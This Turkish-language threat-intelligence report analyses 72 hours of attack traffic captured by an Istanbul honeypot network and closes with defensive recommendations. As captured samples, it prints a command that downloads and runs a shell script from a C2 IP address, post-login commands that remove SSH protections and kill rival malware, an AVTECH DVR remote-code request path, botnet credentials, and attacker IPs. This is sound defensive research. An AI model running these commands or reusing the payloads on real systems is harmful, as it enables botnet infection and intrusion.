72 Saatte 2.8 Milyon Olay — Kripto Madencileri, NSA Exploit'leri ve Zombi Ağları
İstanbul honeypot ağından ikinci güncelleme: 16.964 benzersiz saldırgan, Solana madencilik botnet'i, DoublePulsar hâlâ aktif, IoT kamera exploit zincirleri ve MikroTik API taraması. OPSEC-filtrelenmiş ham istihbarat.
Özet
İlk rapordan 24 saat sonra yeni bir güncelleme. Sistem yeniden başlatıldıktan sonraki 72 saatlik pencere — ve sayılar çarpıcı:
| Metrik | Değer |
|---|---|
| Toplam olay (OPSEC-filtered) | 2.851.855 |
| Benzersiz saldırgan IP | 16.964 |
| Aktif honeypot sensörü | 14 |
| Veri penceresi | 72 saat (5-8 Nisan 2026) |
| Günlük ortalama | ~950.000 olay |
| Zirve gün | 7 Nisan — 1.283.086 olay |
OPSEC filtresinden geçmiş, iç altyapı adresleri ve pasif fingerprinter gürültüsü arındırılmış veri. Geriye kalan: saf saldırı trafiği.
72 saat, 16.964 benzersiz IP. Dakikada 4 yeni saldırgan.
Bu güncellemede üç ana bulgu var: birincisi kripto madencilik odaklı yeni bir botnet ailesi, ikincisi 2017’den kalma NSA exploit’inin hâlâ aktif kullanımı, üçüncüsü IoT cihazları hedef alan koordineli exploit zinciri.
Tüm IoC verilerine Feed Hub’dan ulaşabilirsiniz. İlk hafta raporunu okumadıysanız oradan başlamanızı öneririz.
Günlük Trend: Yükselen Dalga
| Tarih | Olay (filtered) | Değişim |
|---|---|---|
| 5 Nisan | 70.928 | — (başlangıç, yarım gün) |
| 6 Nisan | 443.426 | +525% |
| 7 Nisan | 1.283.086 | +189% |
| 8 Nisan | 1.055.252 | -18% (gün devam ediyor) |
7 Nisan zirvesi dikkat çekici. İlk gün yarım olsa da, 6→7 Nisan geçişindeki %189 artış organik keşif sürecinin ötesinde. Muhtemelen bir tarama botnet’i sensörlerin IP bloğunu hedef listesine ekledi.
Sensör Dağılımı: Ne Yakaladık?
14 aktif honeypot sensörü farklı katmanlarda farklı davranışlar yakalıyor:
Ağ Katmanı
| Sensör | Olay | Görev |
|---|---|---|
| Suricata (IDS) | 2.769.938 | Paket seviyesinde imza eşleştirme — Emerging Threats kural seti |
| Glutton | 41.303 | Multi-protokol tuzak — SSH, HTTP, FTP, SMTP emülasyonu |
Etkileşim Katmanı
| Sensör | Olay | Görev |
|---|---|---|
| Cowrie | 31.699 | SSH/Telnet honeypot — brute force + post-exploitation komut kaydı |
| Dionaea | 3.299 | Malware yakalayıcı — SMB, HTTP, FTP exploit emülasyonu |
| Sentrypeer | 3.016 | VoIP/SIP tuzağı — premium rate fraud taraması |
| Honeytrap | 1.529 | Genel port dinleyici — tanımlanamayan bağlantıları yakalar |
| Mailoney | 766 | SMTP tuzağı — open relay avcılığı, spam kampanya keşfi |
| Tanner | 543 | Web uygulama tuzağı — LFI, RCE, credential harvesting emülasyonu |
Düşük Hacim — Yüksek Kalite
| Sensör | Olay | Görev |
|---|---|---|
| H0neytr4p | 138 | SSL/TLS tuzağı |
| ElasticPot | 45 | Açık Elasticsearch avcılığı — data leak hedefli tarama |
| ConPot | 21 | ICS/SCADA — endüstriyel kontrol sistemi emülasyonu |
| Honeyaml | 11 | YAML tabanlı multi-servis emülatörü |
| Adbhoney | 2 | Android Debug Bridge — akıllı telefon/TV hedefli saldırı |
| Miniprint | 2 | Yazıcı exploit emülasyonu — ağ yazıcısı hedefli tarama |
Olay sayısı düşük olan sensörler, sinyal kalitesi en yüksek olanlar. ElasticPot’a ulaşan 45 bağlantı, açık Elasticsearch instance’ı arayan ve veri sızdırmak isteyen operatörlere işaret ediyor. ConPot’a gelen 21 bağlantı ICS/SCADA hedefli — enerji, su arıtma, üretim tesisleri hedefinde.
Kaynak Ülke Analizi
| # | Ülke | Olay | Oran |
|---|---|---|---|
| 1 | ABD | 496.771 | %17.4 |
| 2 | Vietnam | 440.277 | %15.4 |
| 3 | Brezilya | 339.436 | %11.9 |
| 4 | Fransa | 305.384 | %10.7 |
| 5 | Çin | 220.581 | %7.7 |
| 6 | Almanya | 208.132 | %7.3 |
| 7 | Endonezya | 182.054 | %6.4 |
| 8 | İngiltere | 159.104 | %5.6 |
| 9 | Hindistan | 101.498 | %3.6 |
| 10 | Meksika | 78.336 | %2.7 |
| 11 | İsveç | 36.135 | %1.3 |
| 12 | Pakistan | 35.526 | %1.2 |
| 13 | Hollanda | 33.734 | %1.2 |
| 14 | Singapur | 28.139 | %1.0 |
| 15 | Hong Kong | 20.587 | %0.7 |
Vietnam ikinci sıraya yükseldi. İlk raporda beş-altıncı sıralardaydı — 72 saatte %15.4 oranla ABD’ye yaklaştı. Vietnam kaynaklı trafiğin %94’ü tek bir ASN’den (FPT Telecom — 146.285 olay) geliyor. Bu, büyük ISP müşteri ağında yaygın enfeksiyon veya koordineli botnet aktivitesi anlamına geliyor.
Meksika’nın varlığı da dikkat çekici. Total Play Telecomunicaciones (78.000 olay) tek başına bir ülke gibi trafik üretiyor.
Saldırgan Altyapı: ASN Profilleri
| # | ASN | Olay | Yorum |
|---|---|---|---|
| 1 | GoDaddy.com, LLC | 315.775 | VPS abuse — hosting sağlayıcı |
| 2 | GLOBAL CONECTA TELECOM | 299.339 | Brezilya ISP — enfekte müşteriler |
| 3 | INTERDIGI JSC | 290.734 | Vietnam telecom |
| 4 | Chinanet | 194.582 | Çin devlet ISP — klasik kaynak |
| 5 | Contabo GmbH | 194.070 | Alman VPS — bulletproof hosting şüphelisi |
| 6 | PT Aplikanusa Lintasarta | 177.674 | Endonezya ISP |
| 7 | Neue Medien Muennich GmbH | 174.356 | Alman hosting — tek IP dominant |
| 8 | WHG Hosting Services Ltd | 153.356 | İngiliz hosting |
| 9 | FPT Telecom | 146.285 | Vietnam ISP — tek ASN’den 440K ülke trafiğinin %33’ü |
| 10 | Hostinger International | 98.414 | VPS abuse |
| 11 | Oracle Corporation | 81.076 | Oracle Cloud free tier abuse |
| 12 | Hostnet B.V. | 78.755 | Hollanda hosting |
| 13 | Total Play Telecom | 77.985 | Meksika ISP |
| 14 | Modat B.V. | 50.697 | Bilinen bulletproof hosting |
| 15 | Amazon.com, Inc. | 33.576 | AWS free tier / compromised instances |
Modat B.V. ilk rapordan tanıdık — 50.697 olay ile hâlâ aktif. İlk haftada trafiğin %35’ini üretiyordu, bu pencerede %1.8’e düşmüş görünüyor ama dikkat: ilk haftanın veri hacmi çok daha düşüktü. Mutlak sayı artmış olabilir.
Contabo sürpriz yüksek sırada. Alman VPS sağlayıcısı, abuse raporlarına müdahale süresi yavaş olarak biliniyor. 194.000 olay ciddi bir hacim — muhtemelen birden fazla kiralık VPS botnet node’u olarak kullanılıyor.
Oracle Cloud free tier’ın abuse’a açık olduğu bilinen bir sorun. 81.000 olay ile bu veriyi teyit ediyoruz.
Hedef Port Analizi
| Port | Olay | Servis | Risk Seviyesi |
|---|---|---|---|
| 53 | 2.089.769 | DNS | DNS amplification / DDoS reflektör |
| 1080 | 193.508 | SOCKS Proxy | Açık proxy avcılığı |
| 5900 | 78.799 | VNC | Uzak masaüstü — şifresiz erişim |
| 443 | 27.493 | HTTPS | Web servis keşfi + exploit |
| 5060 | 26.906 | SIP/VoIP | Premium rate fraud |
| 22 | 24.095 | SSH | Brute force + CVE exploit |
| 445 | 20.943 | SMB | EternalBlue / DoublePulsar |
| 80 | 7.258 | HTTP | Web keşif |
| 8728 | 6.248 | MikroTik API | RouterOS hedefli saldırı |
| 8080 | 6.141 | HTTP Alt | Proxy / admin panel |
| 25 | 4.094 | SMTP | Open relay / spam |
| 3389 | 2.622 | RDP | Windows uzak masaüstü |
| 8088 | 2.081 | HTTP Alt | Hadoop / YARN exploit |
| 161 | 1.910 | SNMP | Ağ cihazı keşfi |
| 3306 | 1.465 | MySQL | Veritabanı hedefli |
| 23 | 1.273 | Telnet | IoT botnet (Mirai varyantları) |
| 1433 | 1.215 | MSSQL | Windows DB hedefli |
DNS: 2 Milyon Olayın Hikayesi
Port 53 açık farkla birinci — toplam trafiğin %73’ü. Bu honeypot’ların DNS sunucusu gibi davranıp davranmadığını test eden saldırganlar. Amaç: amplification saldırısı için reflektör bulmak.
DNS amplification’da saldırgan küçük bir sorgu gönderiyor, DNS sunucusu 50-100 kat büyük yanıt veriyor, bu yanıt sahte kaynak IP’ye yönleniyor. Suricata bu kalıbı ET DOS DNS Amplification Attack Inbound imzasıyla 1.014 kez tespit etti.
SOCKS Proxy: Gizlenme Altyapısı
193.508 olay ile port 1080 ikinci sırada. SOCKS proxy arayan saldırganlar, bulduklarında trafiğini bu proxy üzerinden yönlendirerek gerçek IP’sini gizliyor. Suricata GPL INFO SOCKS Proxy attempt imzasını 153.624 kez tetikledi.
VNC: Şifresiz Uzak Masaüstü
78.799 olay. VNC sunucuları genellikle şifresiz veya zayıf şifreyle açık bırakılıyor. Suricata GPL INFO VNC server response imzasıyla 52.126 event — yani saldırganlar VNC banner’ını alıp authentication denemesine geçiyor.
MikroTik API: Router Botnet Altyapısı
Port 8728 ile 6.248 olay — RouterOS API portu. Türkiye, Doğu Avrupa ve Güneydoğu Asya ISP altyapısının büyük bölümü MikroTik tabanlı. Bu portun taranması, router’ları botnet altyapısına çevirmek için ilk adım.
Glutton sensöründe port 8728 en çok taranan port — 1.886 etkileşimli bağlantı girişimi. Saldırganlar sadece port açık mı diye bakmıyor, API komutları gönderiyor.
Suricata IDS: İmza Bazlı Tehdit Analizi
Kritik Tespitler
| İmza | Olay | Tehdit |
|---|---|---|
| SOCKS Proxy attempt | 153.624 | Proxy abuse altyapısı |
| VNC server response | 52.126 | Şifresiz uzak erişim |
| ICMP PING | 39.155 | Keşif / alive check |
| DoublePulsar Backdoor | 7.941 | NSA exploit — SMB backdoor |
| DShield Block Listed | 7.398 | Bilinen kötü IP’ler |
| SSH Scan | 2.096 | Brute force keşfi |
| /etc/passwd in URI | 1.515 | Local File Inclusion (LFI) |
| NMAP -sS | 1.505 | SYN tarama |
| DNS Amplification Attack | 1.014 | DDoS reflektör |
DoublePulsar: 2017 NSA Exploit’i Hâlâ Yaşıyor
7.941 DoublePulsar tespit — bu 2017’de Shadow Brokers tarafından sızdırılan NSA exploit’i. WannaCry ve NotPetya saldırılarında kullanıldı. Aradan 9 yıl geçti.
İki kaynak IP tüm trafiği üretiyor:
- 216.82.43.156 (ABD): 6.503 deneme — tek başına haftanın en ısrarcı exploit operatörü
- 103.109.220.214 (Hindistan): 1.438 deneme
Hedef: Port 445 (SMB). Payload: DoublePulsar backdoor kurulum paketi. Bu IP’ler Windows sistemlerde SMBv1 açık olan makineler arıyor. Bulduklarında backdoor yüklüyor, sonra ransomware veya cryptominer deploy ediyorlar.
Pratik savunma: SMBv1’i devre dışı bırakın. Windows Firewall’da port 445’i dış erişime kapatın. MS17-010 yamasını kontrol edin — 2017’den beri mevcut.
LFI Saldırıları: /etc/passwd Avcılığı
1.515 olay. Web sunucularda ../../etc/passwd path traversal denemesi. Başarılı olursa sistem kullanıcı listesini sızdırıyor, ardından SSH brute force için kullanıcı adı listesi elde ediyorlar.
SSH Honeypot (Cowrie): Saldırganların İç Yüzü
31.699 etkileşimli SSH olayı. Cowrie saldırganların hem giriş denemelerini hem de başarılı girişten sonraki komutlarını kaydediyor.
Kullanıcı Adı Sözlüğü
| # | Kullanıcı Adı | Deneme | Yorum |
|---|---|---|---|
| 1 | root | 1.435 | Her zaman birinci |
| 2 | ubuntu | 208 | Cloud VM hedefi (AWS/GCP/Azure default) |
| 3 | 345gs5662d34 | 204 | Botnet hardcoded credential |
| 4 | admin | 90 | Genel yönetici |
| 5 | sol | 67 | Solana kripto madencilik |
| 6 | operator | 59 | ICS/SCADA default |
| 7 | test | 54 | Geçici hesap hedefi |
| 8 | ftpuser | 48 | FTP sunucu hedefi |
| 9 | steam | 48 | Gaming sunucu — GPU madencilik hedefi |
| 10 | user | 48 | Genel |
| 11 | postgres | 43 | Veritabanı hedefi |
| 12 | solana | 40 | Solana node/validator |
| 13 | support | 39 | Destek hesabı hedefi |
| 14 | ali | 38 | Bölgesel (Ortadoğu/Türkiye/Güneydoğu Asya) |
| 15 | supervisor | 36 | Docker/Process manager |
| 16 | deploy | 33 | CI/CD pipeline hedefi |
| 17 | guest | 30 | Misafir hesabı |
| 18 | default | 27 | Default credential |
| 19 | oracle | 26 | Oracle DB hedefi |
| 20 | solv | 26 | Solana Validator node |
Şifre Sözlüğü
| # | Şifre | Deneme | Yorum |
|---|---|---|---|
| 1 | 345gs5662d34 | 204 | Botnet hardcoded — aynı zamanda kullanıcı adı! |
| 2 | 3245gs5662d34 | 202 | Varyant — typo toleransı |
| 3 | 123456 | 86 | Evergreen #1 |
| 4 | 123 | 38 | Minimal |
| 5 | solana | 35 | Kripto madenci şifresi |
| 6 | admin | 29 | Default |
| 7 | 1234 | 27 | |
| 8 | 12345678 | 22 | |
| 9 | ubuntu | 22 | Cloud default |
| 10 | test | 19 | |
| 11 | 112233 | 18 | |
| 12 | p@ssw0rd | 17 | Leet speak klasik |
| 13 | root | 17 | |
| 14 | password | 16 | |
| 15 | sol | 14 | Kripto kısaltma |
Bulgu 1: Solana Kripto Madencilik Botnet’i
sol, solana, solv — toplam 133 kullanıcı adı + 49 şifre denemesi. Bu klasik SSH sözlük saldırısı değil. Saldırganlar Solana blockchain validator veya madencilik node’u çalıştıran sunucuları hedefliyor.
Solana validator’ları genellikle yüksek CPU/GPU kapasiteli sunucularda çalışıyor — bu makineler kripto madencilik için ideal. Saldırgan planı: Solana node’unu bul → SSH ile gir → kendi madencini yükle → mevcut kripto altyapısını ele geçir.
steam kullanıcı adının 48 denemesi de aynı motivasyonla açıklanıyor. Gaming sunucuları GPU yoğun — madencilik için biçilmiş kaftan.
Bulgu 2: 345gs5662d34 — Botnet Hardcoded Credential
Bu dize hem kullanıcı adı (204) hem şifre (204+202 varyant) olarak kullanılıyor. Mirai ve türevi IoT botnet’lerde hardcoded credential olarak bilinen bir kalıp. Aynı dizeyi giriş bilgisi olarak gönderen 200+ deneme, aynı botnet framework’ünü kullanan dağıtık node’lara işaret ediyor.
Post-Exploitation: “İçeri Girdikten Sonra Ne Yapıyorlar?”
Cowrie saldırganların giriş sonrası çalıştırdığı komutları da kaydediyor. En sık çalışan komut dizisi:
Aşama 1 — Keşif (~220 kez tekrarlanmış):
cat /proc/cpuinfo | grep name | wc -l # Kaç CPU çekirdeği var?
free -m | grep Mem # Ne kadar RAM?
lscpu | grep Model # CPU modeli ne?
df -h | head -n 2 # Disk alanı
uname -a # Kernel versiyonu
whoami # Hangi kullanıcı?Bu keşif profili tek bir soruyu yanıtlıyor: “Bu makine kripto madenciliğe uygun mu?” CPU çekirdek sayısı, RAM kapasitesi, disk alanı — madencilik kârlılık hesabı için gereken üç metrik.
Aşama 2 — Kalıcılık (~218 kez):
cd ~; chattr -ia .ssh; lockr -ia .ssh # SSH key korumalarını kaldır
crontab -l # Mevcut zamanlanmış görevleri kontrol etchattr -ia .ssh komutu kritik: SSH dizininin immutable ve append-only flag’lerini kaldırıyor. Amaç: kendi SSH key’lerini authorized_keys’e eklemek ve kalıcı erişim sağlamak. lockr özel bir araç — bazı güvenlik yazılımlarının SSH dizinine koyduğu kilidi kaldırıyor.
Aşama 3 — Rakip Temizliği (~95 kez):
rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh
pkill -9 secure.sh; pkill -9 auth.sh
echo > /etc/hosts.deny; pkill -9 sleepBu komut dizisi rakip botnet’leri temizliyor. secure.sh ve auth.sh diğer botnet’lerin persistence script’leri. Saldırgan önce rakip çıkarıyor, sonra kendi payload’ını yüklüyor. hosts.deny dosyasını boşaltmak, önceki operatörün IP engellemelerini kaldırıyor.
Aşama 4 — Payload İndirme:
wget -qO- http://196.251.107.133/bins/sin.sh | shBu IP (Afrika bölgesi) bir C2 (Command & Control) sunucusu. sin.sh script’i muhtemelen mimari tespiti yapıp uygun binary’yi indiriyor. Mirai türevi botnet — IoT ve Linux sunucuları hedefliyor.
Aynı kalıpta farklı indirme yöntemleri de deneniyor:
# wget başarısız olursa busybox wget dene
busybox wget -T 9 -qO- http://[C2]/bins/sin.sh | sh &Web Saldırıları (Tanner): Exploit Kataloğu
543 web etkileşimi, her biri farklı bir saldırı vektörü:
IoT Kamera Exploit Zinciri — AVTECH DVR RCE
65 olay — en yoğun web saldırı vektörü:
/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___Bu, AVTECH DVR ve IP kamera sistemlerindeki uzak kod çalıştırma (RCE) zafiyeti. S_O_S_T_R_E_A_MAX komutu ile shell access elde ediliyor. Payload’da iki farklı C2 sunucusu tespit ettik:
- C2 #1: Payload
bbc— muhtemelen x86/x64 Linux botnet binary - C2 #2: Payload
kkk.arm7— ARM mimarisi hedefli, kamera/DVR işlemcilerine özel
ARM payload’ının varlığı önemli: saldırganlar genel sunucu değil, spesifik olarak IoT cihazları hedefliyor. Kamera → botnet node → DDoS silahı.
Hikvision SDK Exploit
5 olay — /SDK/webLanguage endpoint’ine erişim denemesi. CVE-2021-36260 — Hikvision IP kameralarında kritik RCE zafiyeti. 2021’de yayımlandı, hâlâ aktif olarak taranıyor.
Credential Harvesting
| Path | Olay | Hedef |
|---|---|---|
/admin/config.php | 6 | FreePBX yönetim paneli |
/.vscode/sftp.json | 4 | Geliştirici FTP credential’ları |
/adminer.php | 2 | Veritabanı yönetim aracı |
/boaform/admin/formLogin | 2 | Router/modem admin paneli |
/.aws/credentials | 1 | AWS Access Key |
/recordings/index.php | 2 | Telefon kaydı sistemi |
.vscode/sftp.json özellikle ilginç. VS Code kullanıcıları SFTP eklentisiyle çalışırken bu dosyada sunucu adresini, kullanıcı adını ve bazen şifreyi düz metin olarak saklıyor. Saldırganlar .vscode dizinini web root’tan erişilebilir bırakmış geliştirici makinelerini arıyor.
.aws/credentials — tek deneme ama en kritik hedef. Bu dosya AWS Access Key ID ve Secret Access Key içeriyor. Başarılı olursa: tüm AWS hesabı — EC2, S3, Lambda, her şey.
Glutton: Protokol Derinliği
41.303 olay ile Glutton’ın en çok hedeflenen portları:
| Port | Etkileşim | Servis | Yorum |
|---|---|---|---|
| 8728 | 1.886 | MikroTik API | Router botnet |
| 8088 | 341 | YARN ResourceManager | Hadoop cluster exploit |
| 88 | 187 | Kerberos | Active Directory hedefi |
| 47001 | 156 | WinRM | Windows uzaktan yönetim |
| 47808 | 117 | BACnet | Bina otomasyon sistemi! |
| 50070 | 125 | Hadoop HDFS NameNode | Big data cluster |
| 49665-49667 | 343 | Windows RPC | Lateral movement |
BACnet (port 47808) en enteresan bulgu. Building Automation and Control Networks — klima, aydınlatma, asansör, yangın alarm sistemlerinin iletişim protokolü. 117 bağlantı girişimi, bina otomasyon sistemlerini hedef alan tarama anlamına geliyor. Kritik altyapı hedeflemesi.
Hadoop YARN + HDFS birlikte taranıyor. Saldırganlar açık Hadoop cluster’larına YARN üzerinden konteyner deploy edip kripto madencisi çalıştırıyor. HDFS’den veri sızdırıyor.
VoIP/SIP: Telefon Dolandırıcılığı Altyapısı
Sentrypeer: 3.016 olay — SIP/VoIP taraması. Port 5060: 26.906 olay — SIP protokolü.
Toplam ~30.000 VoIP hedefli olay. Saldırganlar açık SIP trunk’lar arıyor. Bulduklarında:
- Premium rate numaralar aranıyor (dakikası $1-5 arası ücretli hatlar)
- Fatura PBX sahibine kesiliyor
- Gelir saldırgana aktarılıyor
Bir hafta sonu PBX hack’i onbinlerce dolarlık fatura üretebilir. ISP ve kurumsal PBX operatörleri için SIP trunk güvenliği kritik.
Top Saldırganlar (OPSEC-Filtered)
| # | IP | Olay | Yorum |
|---|---|---|---|
| 1 | 107.180.114.199 | 313.553 | GoDaddy VPS — otomasyon ağırlıklı |
| 2 | 36.50.177.198 | 290.264 | Vietnam INTERDIGI — botnet node |
| 3 | 109.199.98.14 | 192.824 | Fransa — yüksek hacimli tarayıcı |
| 4 | 202.97.110.66 | 192.649 | Chinanet — devlet ISP altyapısı |
| 5 | 85.13.152.133 | 174.356 | Almanya Neue Medien — tek IP dominant |
| 6 | 209.42.22.207 | 153.205 | WHG Hosting — İngiltere çıkışlı |
| 7 | 42.119.236.237 | 146.035 | FPT Telecom Vietnam — muhtemelen enfekte |
| 8 | 93.127.208.126 | 98.252 | Hostinger — VPS abuse |
| 9 | 192.185.56.220 | 81.035 | Oracle Cloud — free tier abuse |
| 10 | 185.107.91.76 | 78.755 | Hostnet Hollanda |
#1 — 107.180.114.199 (GoDaddy): 313.553 olay, 72 saatte. Saatte 4.355 bağlantı. Bu tek IP, bazı küçük ülkelerin toplam trafiğinden fazla. GoDaddy VPS’lerinde bot ağı altyapısı kurmak ucuz ve hızlı — $5/ay VPS, otomatik script, binlerce hedef.
#7 — 42.119.236.237 (FPT Telecom Vietnam): ISP müşteri IP’si — muhtemelen enfekte bir ev/ofis yönlendiricisi veya sunucu. Sahibi büyük ihtimalle habersiz. 146.000 olay üreten bir zombi.
Sonuç ve Savunma Önerileri
Acil Eylem Gerektiren 5 Bulgu
1. Solana/Kripto Madencilik Botnet’i Aktif
SSH brute force’un yeni nesli artık root/admin değil, sol/solana/solv deniyor. Kripto node’ları ve GPU sunucuları hedefte. Savunma: SSH key-only authentication, fail2ban, port değiştirme.
2. DoublePulsar 9 Yıl Sonra Hâlâ Aktif 7.941 exploit denemesi, 2 kaynak IP. Windows SMBv1 açık olan her makine risk altında. Savunma: SMBv1 devre dışı, port 445 kapalı, MS17-010 yaması.
3. IoT Kameraları Botnet Silahı AVTECH DVR + Hikvision exploit’leri aktif. ARM payload’ları kameraları DDoS node’una çeviriyor. Savunma: kamera firmware güncellemesi, kameraları internetten izole etme, VLAN segmentasyonu.
4. MikroTik Router’lar Hedefte 6.248 API portu taraması. RouterOS API (8728) açıksa router botnet’e katılabilir. Savunma: API portu dışarıdan kapatma, RouterOS güncelleme, güçlü şifre.
5. DNS Amplification Reflektör Avcılığı 2 milyon DNS probe. Açık resolver’lar DDoS silahı olarak kullanılıyor. Savunma: recursive DNS’i dışarıdan kapatma, rate limiting.
Genel Güvenlik Tavsiyeleri
- SSH: Key-only auth, fail2ban, 22 dışı port, root login kapalı
- VNC: İnternete açık bırakmayın, VPN arkasına alın, güçlü şifre
- SOCKS/Proxy: 1080 portunu kapatın, gereksiz proxy servisleri kaldırın
- Web:
.vscode,.aws,.gitdizinlerini web root’tan erişilemez yapın - VoIP: SIP trunk’larda IP whitelist, uluslararası arama kısıtlaması
- IoT: Firmware güncel, VLAN segmentasyonu, varsayılan şifre değiştirilmiş
Feed ve IoC Erişimi
Bu rapordaki tüm IoC verileri makine-okunabilir formatlarda mevcut:
- JSON Feed: /feed/json — SIEM entegrasyonu için
- CSV Feed: /feed/csv — tablo işleme için
- STIX 2.1: /feed/stix — TAXII uyumlu platformlar için
API entegrasyonu için dokümantasyon sayfasını ziyaret edin.
Bir sonraki rapor 14 Nisan’da. Modat kümesinin davranış evrimi, Solana botnet’inin kaynak analizi ve RIPE Atlas verisiyle saldırı yolu haritalaması izleyeceğimiz konular.
Bu rapor SiberKale honeypot ağından elde edilen verilere dayanmaktadır. Tüm veriler OPSEC filtresinden geçmiş olup iç altyapı bilgisi içermemektedir. IoC verileri CC0 lisansı ile paylaşılmaktadır.